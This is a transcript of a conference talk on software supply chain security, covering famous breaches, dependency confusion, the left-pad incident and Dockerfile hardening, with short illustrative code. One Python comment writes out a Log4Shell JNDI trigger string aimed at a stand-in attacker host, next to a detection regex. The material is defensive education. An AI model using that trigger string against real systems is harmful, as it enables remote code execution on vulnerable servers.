Transcript
This transcript was autogenerated. To make changes, submit a PR.
Hi, welcome to Addressing Security Concerns in Every Stage of the Software Supply Chain. My name is Melissa McKay. I'm a developer advocate at JFrog. Just some quick background on me: for well over 20 years now I've primarily been a developer, all the way from a lowly intern to a principal engineer, and for the last few years of my career I've been a developer advocate, going to conferences, talking and sharing about these experiences. A lot of this talk will be exactly that: things I found over the course of my time as a developer. My contact information is here if you have any questions, and I'll share it with you again at the end.

So one of the things I've been able to do as a developer advocate is have a lot of interactions with other people, people who work at other companies and deal with lots of different things. One gentleman I had the pleasure of meeting and working with was Damian Curry. He is the business development technical director at F5, and was with NGINX originally. With him, we decided to get together and explain the journey of an application.
Basically, what we wanted was a series going through each of the stages you plan for, discussing the necessary steps you need to take to get an application all the way from the very beginnings of development into production. We created a list of episodes, each of varying length, maybe 30 to 45 minutes each. The one that was really interesting was the one where we considered security, and that's what I'll focus on in this talk. It was really interesting to get both a developer's perspective, my own, and an ops perspective, which was more Damian's field.

So I don't know how many of you have seen this.
This is just a typical default web server page, and way back, this was my very first experience even thinking about security. During my time in school, and in the very beginning when I was learning as a junior, it just didn't cross my mind how many things we need to be concerned with in addition to just writing good code. There are other things about our environments that we really need to pay attention to as developers, and one thing that was introduced to me was security through obfuscation. I didn't even say that word correctly. This was funny, because we can go on and on about whether this is a good strategy or not, but it was my first experience touching on security at all. Basically, my first step was to go through and make sure that this default page didn't show up, because we didn't really want to reveal which version of Apache we were using, just in case someone had any clever ideas about attacking that particular version.

So obviously, there are lots of reasons to be concerned with security. All over the news we hear about theft of private customer and company data. I just got a letter in the mail, as probably a lot of you have, from various banks and other places that use my credit. So there are lots of reasons, and lots of money, in this business. Speaking of money: if an organization isn't taking its security seriously, or it suffers an intrusion, there can be a loss of money not only on its side but on the customer side, and a loss of credibility as well. And we can all agree that downtime, for any reason, is a problem in your production environment. Yet another reason to be concerned with security issues.
I'm just going to whip through some famous hacks. This one, probably most of you are familiar with: the Equifax data breach. It happened March through July of 2017, and there was a lot of money involved: $1.4 billion in cleanup costs, an estimated $1.38 billion in consumer claims, and 143 million customers affected. For those of you familiar with this, it was an Apache Struts vulnerability. Unfortunately for the company, the vulnerability was known; it just wasn't patched in time.

What happens in a nutshell with this next one, Log4Shell, is that one can trigger remote code execution by providing a string in a certain format that ends up being logged. It turns out that opens up the ability to initiate an LDAP lookup, fetch some compiled code, and execute it. Just about every Java developer out there cringed their way through fixing this vulnerability. It took a lot of time, and lots of money as well.
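To make the mechanism concrete: the trigger was a lookup string embedded in any value that ended up being logged, such as an HTTP header. The sketch below is purely illustrative, not the actual exploit and not a complete defense; it just shows the general shape of the string and a naive detector for it:

```python
import re

# The Log4Shell trigger string embedded in logged input looked roughly like:
#   ${jndi:ldap://attacker.example.com/a}
# When a vulnerable Log4j version logged it, the JNDI lookup could fetch and
# execute remote code. This naive detector is for illustration only; real
# payloads used nesting and obfuscation to evade simple patterns like this.
JNDI_PATTERN = re.compile(r"\$\{jndi:(?:ldap|ldaps|rmi|dns)://", re.IGNORECASE)

def looks_like_jndi_lookup(log_line):
    """Return True if a log line contains a suspicious JNDI lookup string."""
    return bool(JNDI_PATTERN.search(log_line))
```

The real fix, of course, was upgrading Log4j itself, not filtering log lines.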
When we're talking about money, we're not talking about just claims; we're talking about the time that developers and ops need to spend fixing these problems. Stephen Magill, the vice president of product innovation at Sonatype, estimated that approximately 70,000 open source projects use Log4j as a direct dependency, and 174,000 projects use it as a transitive dependency, meaning a dependency of a dependency.

All right, here's another one. This is just interesting to me. I went looking to see what the most recent attacks were. We hear this stuff in the news all the time. A lot of these have to do with data breaches, and this website tracks the latest data breaches. Data is of course a huge motivator for hackers due to its immense value, and there are several of these breaches each month. There are already some new ones that have come out, but a few really caught my attention, mainly because of the common thread of the MOVEit hack between all of them. On June 1, 2023, the MOVEit hack affected Zellis, British Airways, the BBC, and others. MOVEit is a popular file transfer tool.
Again, in July 2023, it reared its ugly head: there was a PokerStars data breach. PokerStars is the world's largest online poker platform, and it suffered a breach that exposed the information of 110,000 customers. The attackers exploited that MOVEit zero-day vulnerability to gain access to the poker site's systems. They're no longer using the MOVEit transfer application, but a lot of data was stolen in the meantime.

The last one I'll point out, unfortunately, is from August 11, 2023: the IBM MOVEit data breach. 4.1 million patients in Colorado had sensitive healthcare data stolen during another attack that exploited that same vulnerability in the MOVEit transfer software. The systems affected were managed by large companies like IBM, so this was serious business. There's a featured article on TechCrunch, published on August 25, that described the MOVEit hack as the biggest hack of the year by the numbers. It's an interesting one to check out; I've included a QR code here if you want to go read it yourself.

The global average cost of a data breach was $4.45 million in 2023. That's a 15% increase over three years. This is serious business, so we do need to sit back and figure out what we can do to help mitigate these problems. As a developer, it does sound reasonable to say that if you're developing software, writing software, it is your responsibility to write code that is secure. This is absolutely true. But as we talk a little further, there's something you need to understand: it's not all about the code itself.

So just for fun, I discovered this essay, "How to Write Insecure Code." For those of you who like sarcasm, you'll really enjoy this one. There are quite a few third-party organizations that can be hired by corporations to train their developers internally, and I'd highly recommend that approach. But if you're learning these things on your own, this is a really good resource, even just this essay itself. Even though it's kind of a joke, there are things in here that are really good to point out, plus lots of detailed information on how to protect your systems, your container images, and the environments they run in. It's pretty amazing. OWASP, the Open Web Application Security Project, is where this essay lives; that's the resource that has a lot of this information for free. So there's a lot of opportunity for you to go out and learn on your own.
Some of the things included in this essay, I thought were important to point out. "Always use default deny": this one is kind of silly. Deny that your code can ever be broken, unless something can actually be proven broken. Just pretend everything's fine. "Secure languages": who writes in secure languages? I think we all have a tendency to adore the language we were brought up with. My background is in Java; I enjoy writing a lot of Java, and that's where I'm most familiar. But we all know that all of our languages have pros and cons, and each has weaknesses we need to learn.

"Mixing different languages": this is kind of funny, being a Java developer. It's important to point out that these days, rarely will you find a Java developer whose only language is Java. There are lots of other languages you need to learn in order to get things like web apps out there, to be able to write shell scripts, things like that. There's a lot of Python these days, and a lot of opportunities to learn and work with other languages as well. One of the jokes in this essay is that if you mix as many as possible, you'll be fine: they all have different security rules, so it'll be difficult to break into any of them. Pretty silly idea.

A few more before I let you go read the rest on your own. "Relying on security checks done elsewhere": this is a big one for developers, right? Because we're often on teams, and if you're in a larger company, there may be a whole separate security team dealing with a lot of these issues. So it's easy to sit back and think, oh, that's already being taken care of by someone else, so I don't really need to think about it. Obviously, learning about a security problem much later in the development process is a lot more expensive and difficult to mitigate than dealing with it, or preventing it, up front with the developer. So anything we can do to help this process is valuable, and we do need to learn what's in our developer's toolbox to help us prevent some of these things from happening.
"On trusting insiders": malicious input only comes from the Internet, so you can trust that all data in your databases is perfectly validated, encoded, and sanitized for your purposes. Anyone who's been dealing with this, especially if you switch back and forth between a production and a test system, knows there's opportunity for trouble if you're granted too many permissions, or if the systems aren't set up in a way that prevents accidents. Obviously, you can get problems from within; they don't always come externally.

And then, "code wants to be free." This last one is about dropping your source code into repositories that are accessible by everyone within the company. Especially back when I was a junior, I used to want access to everything. I wanted to see everything, mainly because I was curious. But oftentimes that's not best. It's for your own protection to only have access to what you actually need. Being able to update a repository or change code that isn't even in your project is not a real safe way to operate. And we have to remember that a lot of the time, when errors or issues happen, it wasn't on purpose, it wasn't malicious intent; it could have been just an accident. So we have permissions to give us some guardrails to prevent things like that from happening.
So educating developers is really important. I talked about this: I was lucky enough to be involved with an organization that hired one of these third-party companies to train us a little. Depending on your particular language focus, you had specialized activities to learn about all of these things. We learned what SQL injection was, what cross-site request forgery was, what LDAP injection was, and how to prevent them. After taking those courses, I really thought I knew my stuff. I thought, well, I'm going to write the most secure code ever; this is all I really need, and as long as I do that, everything's going to be fine. What I didn't understand at the time, and quickly learned thereafter, is that even though I was confident writing strong code myself, there's so much open source code that we use.
Part of being a responsible developer is not continuously reinventing the wheel when it's not required. Being able to go out and find resources you can build on will help you get your applications to production faster and deal with issues faster. If you have frameworks that work really well for you, you'll develop your applications more efficiently. So it turns out there's a ton of code that you may never have written, may never look at, and don't know much about, other than that it's the building blocks you're building on top of. Like this iceberg picture: there's a lot of code pulled in during your build that you've never touched or looked at before.

When I was working with Damian on our series, there was a little project we were working on with a number of different components, and I ran a Maven dependency tree just to see what all of the dependencies were. It turns out that in just the single component we were looking at, there were 114 direct and indirect dependencies, and they went seven layers deep: dependencies of dependencies of dependencies. These were all brought in from Maven Central as I did a build. And that entire application consisted of seven microservices, so multiply this by seven.
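You can see this for your own projects with `mvn dependency:tree`. As a rough sketch, here's one way to count total dependencies and nesting depth from that output; the sample tree and the three-characters-per-level parsing rule are simplifying assumptions about Maven's tree format:

```python
# Simplified sample of `mvn dependency:tree` output. Maven prefixes each
# dependency line with tree-drawing characters like "+- " and "|  \- ".
SAMPLE = """\
com.example:app:jar:1.0
+- org.slf4j:slf4j-api:jar:1.7.36:compile
+- com.fasterxml.jackson.core:jackson-databind:jar:2.13.0:compile
|  \\- com.fasterxml.jackson.core:jackson-core:jar:2.13.0:compile
\\- junit:junit:jar:4.13.2:test
   \\- org.hamcrest:hamcrest-core:jar:1.3:test
"""

def count_dependencies(tree_output):
    """Return (total dependency count, deepest nesting level)."""
    total, max_depth = 0, 0
    for line in tree_output.splitlines()[1:]:  # skip the project's own line
        # Depth = number of 3-character tree segments before the artifact.
        stripped = line.lstrip("|+\\- ")
        depth = (len(line) - len(stripped)) // 3
        total += 1
        max_depth = max(max_depth, depth)
    return total, max_depth
```

On the small sample above this reports 5 dependencies going 2 levels deep; on the component from our series it would have reported 114 and 7.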
There are a lot of security reports out there that you can take a look at. This one is particularly interesting: the Open Source Security and Risk Analysis report. In this one, 1,703 commercial codebases across 17 different industries were scanned. When you're reading reports like this, always look at the methodology; this number is kind of buried in the report, but it gives you an idea of where the information is actually coming from, and I'm always impressed when that is up front for you to see. This one was, and they have a number of graphs for the different industries. I liked how they categorized all of these things, because sometimes when we work in a silo, we don't realize how much code is being written everywhere, in every industry. These three graphs were pretty important; I took them directly from the section on the use of open source, from the three industries I thought were most interesting.

Also interesting, and maybe a fun conversation with your colleagues, is why there's such a peak in 2020. I can only imagine. With that peak in vulnerabilities, I don't know if more were simply being discovered in 2020, or more being introduced. You can go round and round with your colleagues on that one.
If every developer who writes code writes secure code and doesn't make mistakes, then we shouldn't have any of these problems, right? Is it really all up to developers? I think you already know the answer. There is a lot that we can do, but there's actually a lot we aren't involved with, even for the code we've written. It doesn't matter how well we've written it; there are still issues we need to be aware of. This is a perfect example: SolarWinds. This involved 18,000 customers that received an update containing malicious code with a backdoor. Basically, 4,000 lines of code were written into the Orion platform DLL, but it was done after compilation, which suggests that the binary may have been switched in the CI system internally. What made this foolproof is that the file was even digitally signed. So it's possible that attackers had access to the SolarWinds software development or distribution pipeline. After the code was written and sent off to be built and delivered, something happened in between. So it's just way more complicated than developers themselves writing secure code.

This is a corporate slide that I see often in decks within JFrog, and it gives you a view of the world of all the environments we work with, all of the components we put together when we build our software. You can see the whole process here: a developer initially writing code, pulling in packages and libraries from remote or public repositories, going all the way through building it on your CI servers, whichever tool you choose. I just want to highlight all of the red arrows, everywhere we refer to artifacts and dependencies. There are a lot of weak points in here that, if an attacker has access to them, let them interrupt this flow and basically cause you to put a vulnerability out into production.

One organization that has been helping define all of these areas where there can be issues is Supply-chain Levels for Software Artifacts, or SLSA (pronounced "salsa"). This is basically an attempt to measure an organization's progress and give it goals to improve: a baseline to start with, and ideas about which areas of your software development process you can improve. Between your source code and the delivery of your product, or the deployment of your service, there are places where you really do need to take extra care to protect your supply chain, and each of these red triangles represents an opportunity for an attacker to disrupt.
So let's talk about a few more examples of things developers need to be aware of, things we can have some control over. One of these is called a dependency confusion attack. This was described by Alex Birsan in a blog post on Medium a couple of years ago. It turns out that most projects have a collection of dependencies that includes open source or publicly available packages as well as internal packages. In this example, the highlighted yellow entries are internal package names. Note that the version requirements for these are just that: the version is either the one specified or greater. Those package names are not secret when you build, either; it turns out that npm requests can reveal internal package names. So what exactly is the problem here?

Well, let's take a look at what it means. In the diagram, a request is made for a corporate library, an internally built library, something that may be proprietary, and it's expected to come from some internal repository. But what happens instead is that the package manager sees there's a greater version available publicly, and it pulls that one instead. Who knows what's in that package? Havoc ensues. You'll probably find out pretty quick. Or maybe you won't: it could be something running in the background that you don't see right away. One way to protect yourself from a scenario like this is to control your requests for internal packages. Using an artifact management system, you can specify that internal package requests only be resolved from internal repositories. It's important to remember to do this, because it isn't the default setup, right? By default, you pretty much have access to anything.
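For npm specifically, one common way to enforce this is to put internal packages under a scope and pin that scope to your internal registry. A hedged sketch of an `.npmrc`, where the scope name and registry URL are made-up placeholders:

```ini
# Route every package under the internal @mycorp scope to the private
# registry, so a same-named public package with a higher version can
# never win resolution for internal names.
@mycorp:registry=https://artifacts.internal.example.com/api/npm/npm-local/

# Everything else still resolves from the public registry (the default).
registry=https://registry.npmjs.org/
```

Other package managers have equivalent mechanisms; the point is that the routing decision is explicit instead of left to version comparison.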
Depending on how your organization works, you may be in a position where you don't have access to the Internet other than through proxies provided by your employer, or you may be behind a firewall of some sort. But most of the time, especially when you're developing pet projects at home or in other environments, you're going to be pulling directly from public repositories. So it's important to understand that that's what's happening, and to know the default behavior of your build software, so you know exactly what you're pulling in and where it's coming from. This particular attack earned $130,000; Alex did a really good job of employing himself with these bug bounties. There are quite a few details he discusses in his article that I didn't cover, so here's another QR code for you to read his original write-up.
All right, here's another fun one: managing open source dependencies. Many of you have probably seen this xkcd; it's one of my favorite cartoons. This problem has more to do with managing open source packages and libraries themselves. It's not really about a malicious or vulnerable package; it just illustrates a trap we fall into when we rely solely on public repositories, on things other people have written, for our builds. And the best example of where this problem rears its head is the left-pad incident.

Basically, a developer had an npm package out there named kik. It was just a pet project that helped developers set up templates for their projects, and it wasn't widely known. But there was also a Kik organization, a chat app, and they owned the kik domain. They had trouble with this kik package being out there on npm, because it seemed like someone wanting to pull in kik would expect to get something associated with Kik the company. Kik also had a registered trademark on the name, so there were some issues. They contacted the developer and tried to come to an agreement; they were not able to. So npm came in, and because of its policy of making sure users get the package they expect, in order to eliminate typosquatting and that kind of thing, it sided with the Kik organization. Under that policy, usually what happens is that the existing package with the disputed name stays where it is, remaining on the npm registry, while the new owner of the name publishes their package with a breaking version number. So that's what happened.
But unfortunately, the developer then unpublished his package, along with 272 other packages that he wrote. He was obviously pretty miffed about the decision and did not support it at all. One of those packages was left-pad. This was a pretty big deal, because it turned out that a lot of software out there relied on left-pad, often not even directly, but as a transitive dependency. So things broke right away. A developer stepped in, Cameron Westland, who, to help with the problem, published an identical version of the package, labeled version 1.0.0. But many of the pieces of software that relied on it originally were following best practices and explicitly requesting version 0.0.3. So it was still a big problem.
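For a sense of scale, the package at the center of all this was only a handful of lines. Here's a Python sketch of what left-pad did (the original was JavaScript):

```python
def left_pad(text, length, ch=" "):
    """Pad `text` on the left with `ch` until it is `length` characters long.

    A Python re-creation of the behavior of the left-pad npm package:
    roughly a dozen lines of string padding that an enormous amount of
    software depended on transitively.
    """
    text = str(text)
    while len(text) < length:
        text = ch + text
    return text
```

That's it. For example, `left_pad("5", 3, "0")` gives `"005"`.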
People had to figure out exactly where in their code they were relying on it and make sure they were getting the right package. Now, the most interesting thing about that story is this: these are the lines of code that were at issue and caused so much trouble. If any of you deal with or work in JavaScript, you might be familiar with React. React, which is widely used and was created and used by Facebook, was broken because of this; many of these projects relied on left-pad as a transitive dependency. Just a tiny little piece of code, and such a big problem when it got removed from a public repository. Now here's another one.
I am a Docker Captain, so I deal a lot with containers. But I do remember, back when I was first learning how containers are built and combing through Dockerfiles, there were a lot of issues I didn't understand; I didn't know what was going on under the covers. This is a very contrived file, but it's something you might find when you're looking for examples of how to write a Dockerfile, and there are just a couple of things I'm going to point out; I won't go through everything. So the first line. First of all, a lot of Docker images rely on base images. Where are these base images coming from? Think about that. By default, they come from Docker Hub, unless you explicitly ask for them from another registry. So make sure you understand where your base images are coming from. There are a lot out there.
There are a lot that are trusted and well maintained, so make sure you're using those. Also, there's no tag or SHA identifier here. I would argue that even a tag isn't enough to actually pin an exact version, because it's more of a pointer than anything; a tag can be overwritten, and you might get something completely different from what you were expecting. We see this a lot when people rely on latest: you'll get the latest of the image. Sometimes that's appropriate, like in an R&D environment where you always want the latest build, but in production I wouldn't rely on latest. I would pin that version down to make sure you don't get any surprises. All right, another one.
Lines two through four. These commands update packages in the base image, and you can see some don't pin versions: line three has no version number at all, and line four pins a particularly old version, which could be bad; it could have a vulnerability in it. I see people discover this most often when a new developer joins the team and builds from scratch in a fresh environment. They don't have the advantage of an already-populated cache, so they might run into problems where some of these packages come in differently from what everyone else has. So it's good to pin those versions down. What else?
Oh, line seven: referring to external resources. This is just a curl of a script. I was once in a situation where our team needed a proprietary piece of software installed, and we did exactly this: we took the shell script provided by the company, brought it in, and ran it. It worked fine for a while, but then the company decided to move or change it. First it was changed to an incompatible version, which obviously wasn't going to work for us. Next, it moved to a completely different location. Each time, we had broken builds and had to figure out why. So rather than relying on an external resource like this, the best thing you can do is bring it into your internal environment and manage it there, so that you control when it's updated or moved, rather than trying to coordinate with an external source.
Lastly, line nine: images running as root. This is big. I feel bad sometimes about saying it, because it seems like an obvious thing now; it's talked about a lot. Don't run images as root; always pay attention to the policy of least privilege. But even in 2022, Sysdig, which puts out its cloud-native security and usage report every year, discovered that out of 3 million containers they were observing, 76% ran as root. Sometimes that's legitimate, but the important thing is to know why you're running as root. If you're just doing it by default, that's probably not a good situation to be in. And I'm going to hammer on this a little more, because a more recent report just came out, and we're not getting better at this, we're getting worse: out of 7 million containers observed, 83% were running as root. So, lots of problems.
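Putting all of those Dockerfile points together, a contrived "fixed" version of the file might look something like this. Every image name, digest, version, and path here is an illustrative placeholder, not a recommendation of specific versions:

```dockerfile
# Pin the base image by digest, not just a tag: a tag is a movable pointer,
# a digest is not. (The digest shown is a placeholder.)
FROM ubuntu:22.04@sha256:<digest-of-a-verified-base-image>

# Pin explicit package versions so every build, on every machine, installs
# the same thing. (The version string is a placeholder.)
RUN apt-get update \
    && apt-get install -y --no-install-recommends curl=7.81.0-1ubuntu1 \
    && rm -rf /var/lib/apt/lists/*

# Install the vendor tool from an internally managed copy instead of
# curl-ing a script from a URL the vendor can move or change.
COPY vendor/install-tool.sh /tmp/install-tool.sh
RUN sh /tmp/install-tool.sh && rm /tmp/install-tool.sh

# Least privilege: create and switch to a non-root user.
RUN useradd --create-home appuser
USER appuser
```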
Is there any hope? Let's talk about some solutions, some actionable items where we can improve our situation. First thing: educate ourselves. I'm going to hammer on this a lot. I know developers already have a full plate; there's already a lot we need to know. But as developers, we also understand that this is a career where you're constantly learning; things are constantly changing, and you constantly need to keep up. So adding security knowledge to your toolbox is extremely important. No one is ever going to know everything at first, so it's important to have teams that combine more senior folks with juniors. It can be very difficult if all you have are juniors on your team. We really do need to work on mentorship, making sure we're guiding the next generation so that we don't fall into the same old traps over and over again.

Some ideas for education: I brought this up earlier in the talk, the OWASP resources. They have cheat sheets on their website; there's a QR code for you here. All kinds of stuff you can learn, including the things I mentioned earlier that I learned through a third party, like cross-site scripting and SQL injection. They go through all of these, with a very detailed section on containers and their environments too. Always very good references for developers to take advantage of.

Another one: the OpenSSF organization has a trio of free courses. These three are part of the Secure Software Development Fundamentals professional certificate program. If you pay some money, you can actually get a certificate for taking them, but they also let you audit the courses for free. All of them are available on the edX platform. So that's another easy resource for you to take advantage of.
All right, I'm going to go through the rest of these pretty quickly. Don't rely solely on public repos; remember the left-pad incident I talked about? That's one reason. I'm not going to say public repos are bad to use. Obviously they're valuable: you need them to get the initial packages you need, and they're the place where developers share open source software. Just make sure that you save every artifact you need for your builds in a local artifact management system, something you have control over, that you can manage and take inventory of. There are lots of tools out there. Obviously, my employer is JFrog, so I could recommend Artifactory, but there are other tools available, even open source ones, that you can start with. The important point is just to have one, and to keep track of your dependencies so you don't have broken builds for unknown reasons.

All right, manage your dependencies. Again, I recommend an artifact management system; any one, just have one. But also make sure that you specify explicit versions in your software so you know exactly which packages you're getting. In the case of Docker images, pinning by SHA digest is appropriate, and for some of your npm packages, using a SHA is appropriate as well. So make sure you're doing this.
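In package.json terms, that means exact versions rather than ranges; the package names and versions below are illustrative placeholders:

```json
{
  "dependencies": {
    "left-pad": "1.3.0",
    "@mycorp/billing-client": "2.4.1"
  }
}
```

Combined with a committed lockfile (package-lock.json records a resolved integrity hash for each package), you know exactly what you're getting on every build.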
Manage permissions. This is so important. It's probably more controlled in an ops environment, but developers need to pay attention to it too. They need to enforce least-privilege access, and that requires an understanding of which permissions are actually needed and actually going to be used. That brings me to the latest Sysdig report as well: it pointed out that 90% of granted permissions are not even used. This is dangerous. It sets you up not only for malicious activity but for serious accidents. Not a good thing to go through, especially as a junior developer, if you accidentally wipe out your production database, for example. So these are things we need to be paying attention to.

Okay. Managing your dependencies and your permissions is not enough. You need to regularly scan your libraries and packages. It's not a one-and-done thing to say, oh, I brought in this package, it's good, I've got it stored locally, this is what I'm going to use forever and ever. New vulnerabilities are discovered all the time, so it's important to stay up to date. Make sure you're scanning regularly so that you discover issues in the first place, and have a process where your developers can fix them. That involves keeping up with maintenance: not only do your packages need to be updated and reviewed periodically, but so do your systems, the environments your software runs in. They also need to be updated regularly.
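As a starting point, most ecosystems ship or support a scanner you can run locally or wire into CI. These two commands are examples for npm and Maven projects respectively; the Maven one uses the OWASP Dependency-Check plugin, which you would normally also configure in the POM:

```shell
# Check an npm project's dependency tree against the npm advisory database.
npm audit

# Scan a Maven project's dependencies with OWASP Dependency-Check
# (the first run downloads vulnerability data, so it takes a while).
mvn org.owasp:dependency-check-maven:check
```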
Don't let things get stale. And lastly, make sure you have a plan in place for when it comes time to deal with a security threat in production, because it will happen. It will. It's important to have a plan that makes sense, one where you can efficiently and quickly mitigate problems, so there isn't a huge delay between discovering a vulnerability and mitigating it with a patch. That means having automated systems in place: CI, automatic scanning, and the ability to deploy a new version, with that process kept as clean as possible.

So that's all I have for you. If you have any questions, feel free to reach out to me on Twitter or LinkedIn; I'm available in both places. And just remember that there's always something new to be learned as a developer. We all go through that process, and these are just more tools and more awareness in your toolbox as a developer to make your projects more secure. Thank you.